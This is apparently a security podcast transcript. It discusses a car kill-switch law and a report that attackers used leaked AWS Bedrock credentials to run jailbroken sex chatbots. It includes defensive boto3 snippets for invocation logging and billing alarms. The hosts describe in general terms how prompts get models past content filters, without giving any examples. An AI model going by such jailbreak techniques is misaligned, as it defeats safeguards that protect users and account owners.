Matthew: Yeah, I don't know. The other thing you mentioned before we started recording was the new law forcing a kill switch in all cars. So if all cars have to have a kill switch, that means that starting in 2026 they are going to have to have that component in the car.
David: Right. Well, actually, I'd have to look at the law, but I think it says the cars have to be manufactured with it. I don't know if it says anything about you being legally obligated to ensure that connectivity is there for your car if you buy one.
Matthew: Yeah, I don't know.
David: I mean, I imagine that after that kill switch has been around for a year or two, you're going to have all sorts of people offering DIY and mechanic fixes to get rid of it. Because I don't think America's going to put up with it. I certainly hope not.
Anyway, I
Matthew: Yeah, I don't know.
David: mean, I'm [00:42:00] never buying a new car, so I'm not really terribly worried about it, but some Americans might care.
Matthew: That's fair. All right, our final article today, a short one; the second one took a lot longer than I thought it was going to. A Single Cloud Compromise Can Feed an Army of AI Sex Bots, from Krebs. Attackers have figured out the next big way of monetizing a breach, and it's using LLM resources from AWS to run chatbots
that chat about things you don't want your name on the bill for. A company called Permiso, which is in cloud security, put up a canary account for AWS's LLM service, Bedrock, exposed the creds on GitHub, and then turned on prompt logging to see what the bad guys did. You'll never guess what they did next.
David: it was untoward. It
Matthew: It was very tawdry. It apparently only took minutes for attackers to find the key and log in. Holy crap. They might be exaggerating for the story, but I guess it wouldn't surprise me. AWS does not enable prompt logging by default. So apparently this company had worked with some other companies that had LLM [00:43:00] break ins, but they couldn't tell what they were doing because AWS didn't enable the prompt logging.
And they said it was quite expensive in the article.
David: Yeah, but they wouldn't specify. They said their experiment cost them $3,500; that's what AWS charged them while their LLM was being abused. Some of that cost was 75,000 LLM invocations, and the rest was from logging. And because they didn't list the ratio, I kind of got the impression that the bulk of that $3,500 was actually the cost of the logging.
Matthew: Yeah, I agree. It did feel like it was implied that way. So the previous folks who had this happen didn't know what the attackers were doing; they just saw the attackers were using it. I don't know. The question is: is it expensive because of the processing, is it expensive because of the storage, or is it expensive just because they don't want people to do it?
David: Yeah,
Matthew: I don't know.
David: Well, I'm wondering, if it's because of the storage, whether you could [00:44:00] simply minimize the storage and ship the logs out, and whether that would keep the cost at a manageable level.
Matthew: Maybe. I don't know.
David: But they're not going to tell you why they're charging you the cost though. So we don't really know if it's any one of these things.
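For reference, Bedrock does expose a model invocation logging setting you can turn on yourself; a minimal sketch with boto3 might look like the following (field names are from memory of the Bedrock PutModelInvocationLoggingConfiguration API and worth double-checking against current docs, and the bucket name is a placeholder):

```python
# Sketch: enable Bedrock model invocation logging to an S3 bucket so you can
# see what prompts are being run against your account. Verify field names
# against the current boto3 docs; the bucket is a placeholder.
import boto3

bedrock = boto3.client("bedrock", region_name="us-east-1")

bedrock.put_model_invocation_logging_configuration(
    loggingConfig={
        "s3Config": {
            "bucketName": "my-bedrock-invocation-logs",  # hypothetical bucket
            "keyPrefix": "prompts/",
        },
        "textDataDeliveryEnabled": True,        # log prompt and response text
        "imageDataDeliveryEnabled": False,
        "embeddingDataDeliveryEnabled": False,
    }
)
```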
Matthew: That's true. So, apparently the attackers are using prompts that use quote unquote jailbreaks to allow the models to respond without content filtering. And this is, I think, the best way to run a business. You're using someone else's infrastructure.
David: It's genius.
Matthew: This is genius.
David: I thought it was interesting, though, that AWS is actively looking for compromised AWS keys. To quote the article, which is quoting a statement from AWS: AWS quickly and automatically identified the exposure and notified the researchers, who opted
not to take action. We then identified suspected compromised activity and took additional action to further restrict the account, which stopped the abuse.
Matthew: [00:45:00] Hmm.
David: And AWS says that flagged credentials can't be used to create or modify authorized accounts or spin up new cloud resources. The author reached out to AWS, and AWS responded by including Bedrock in the list of services that will be quarantined from now on in the event an AWS key pair is found compromised or exposed.
Matthew: feels a lot different.
David: Yeah, I mean, the article seems to be kind of poo-pooing AWS, but based on that, AWS has come a long way from the old days if they're doing these things to actively help customers minimize the damage of an account takeover.
Matthew: Yeah. All right, I realize in our notes we didn't describe exactly what the bots are doing, and I don't think I want to. It's pretty bad. It is definitely stuff that you are not going to want your business associated with. Apparently there's a website that sells [00:46:00] the interactions with these bots for up to like five bucks a month or something.
And that's also probably why they host them on other people's resources: if they hosted them on resources they were paying for, they'd probably get kicked off the services real quick.
David: Right. Well, I mean, because they're jailbreaking them, quote unquote, by, by fronting the prompts, that probably violates terms of service anyway.
Matthew: Yeah, so this is the type of service that, if it's not illegal, is going to be illegal. I mean, parts of it don't sound illegal, but parts of it do, anyways. All right, so no great insights here for me. I just thought it was incredibly disturbing, and interesting how creative attackers can be.
And like I mentioned a minute ago, you definitely don't want to have your business associated with this type of thing.
David: Yeah, one thing I thought you might be able to do is set up some Google Alerts for your company. I thought of that because the chatbot vendor mentioned in the article removed or took some [00:47:00] actions after the story broke. So I was thinking, well, how could they have found out so quickly?
I doubt they read Krebs.
Matthew: okay. They doubt they
David: doubt they read Krebs,
Matthew: It's
David: Well, I mean, they have a chatbot, so they obviously know how to read. But I don't think they read Krebs. So they may have some Google Alerts or something set up to notify them when someone's talking about their company. So it might not be a bad idea to do that for your own company.
Because something like this may be happening and you may not even hear about it.
Matthew: Yeah. Hmm. I don't know how you find out about this in any reasonable way, because if you don't have the logging turned on and you don't have anything like statistics-based alerts on your usage, you're like, wow, our LLM usage is way up, must be those marketing folks using it a lot or something like that.
Or the [00:48:00] research folks are using it a lot. If you don't have that turned on and someone's just quietly using it, nobody comes and tells you about it. You could just be paying an extra couple of thousand or tens of thousands of dollars for the foreseeable future. Yeah.
David: That's the key: know what the logging capabilities are in AWS, and have your billing alarms set up so you can recognize this stuff when something out of the norm happens.
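A minimal version of the billing alarm David is describing might look like this; the threshold and SNS topic are placeholders, and billing metrics only appear in us-east-1 after billing alerts are enabled on the account:

```python
# Sketch: a CloudWatch alarm on the account's estimated charges, so a hijacked
# Bedrock key shows up as a billing spike instead of a month-end surprise.
# Threshold and SNS topic ARN are placeholders.
import boto3

cloudwatch = boto3.client("cloudwatch", region_name="us-east-1")

cloudwatch.put_metric_alarm(
    AlarmName="estimated-charges-over-5000-usd",
    Namespace="AWS/Billing",
    MetricName="EstimatedCharges",
    Dimensions=[{"Name": "Currency", "Value": "USD"}],
    Statistic="Maximum",
    Period=21600,                 # the billing metric updates a few times a day
    EvaluationPeriods=1,
    Threshold=5000.0,             # pick something relative to your normal bill
    ComparisonOperator="GreaterThanThreshold",
    AlarmActions=["arn:aws:sns:us-east-1:123456789012:billing-alerts"],
)
```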
Matthew: If your bill doubles from month to month and you don't have a corresponding increase in revenue, you need to look at that and be like, what's going on here, buddies? All right, well, that looks like all the articles we have for today. Thank you for joining us. Follow us at SerengetiSec on Twitter.
And, you know, maybe we'll talk about you in a future episode, subscribe on your favorite podcast app.
[00:49:00]